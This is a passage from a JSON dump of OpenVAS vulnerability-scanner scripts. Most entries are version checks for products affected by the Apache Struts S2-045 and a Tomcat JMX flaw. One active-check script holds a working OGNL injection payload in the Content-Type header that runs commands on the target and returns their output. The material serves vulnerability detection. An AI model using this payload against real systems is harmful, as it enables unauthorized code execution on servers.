value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "openvas", "title": "Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8735"], "modified": "2019-05-10T00:00:00", "id": "OPENVAS:1361412562310810966", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810966", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tomcat_rce_vuln_jun17.nasl 71279 2017-06-28 16:34:52Z jun$\n#\n# Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810966\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2016-8735\");\n script_bugtraq_id(94463);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-28 17:04:45 +0530 (Wed, 28 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an unspecified error in\n 'JmxRemoteLifecycleListener'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat before 6.0.48, 7.x before\n 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12.\n Note:This issue exists if JmxRemoteLifecycleListener is used and an attacker\n can reach JMX ports.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 6.0.48, or 7.0.73 or\n 8.0.39 or 8.5.8 or 9.0.0.M13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q4/502\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:appVer, test_version:\"6.0.48\")){\n fix = \"6.0.48\";\n}\nelse if(appVer =~ \"^7\\.\")\n{\n if(revcomp(a: appVer, b: \"7.0.73\") < 0){\n fix = \"7.0.73\";\n }\n}\nelse if(appVer =~ \"^8\\.5\\.\")\n{\n if(revcomp(a: appVer, b: \"8.5.8\") < 0){\n fix = \"8.5.8\";\n }\n}\nelse if(appVer =~ \"^8\\.\")\n{\n if(revcomp(a: appVer, b: \"8.0.39\") < 0){\n fix = \"8.0.39\";\n }\n}\nelse if(appVer =~ \"^9\\.\")\n{\n if(revcomp(a: appVer, b: \"9.0.0.M13\") < 0){\n fix = \"9.0.0-M13\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:tomPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n 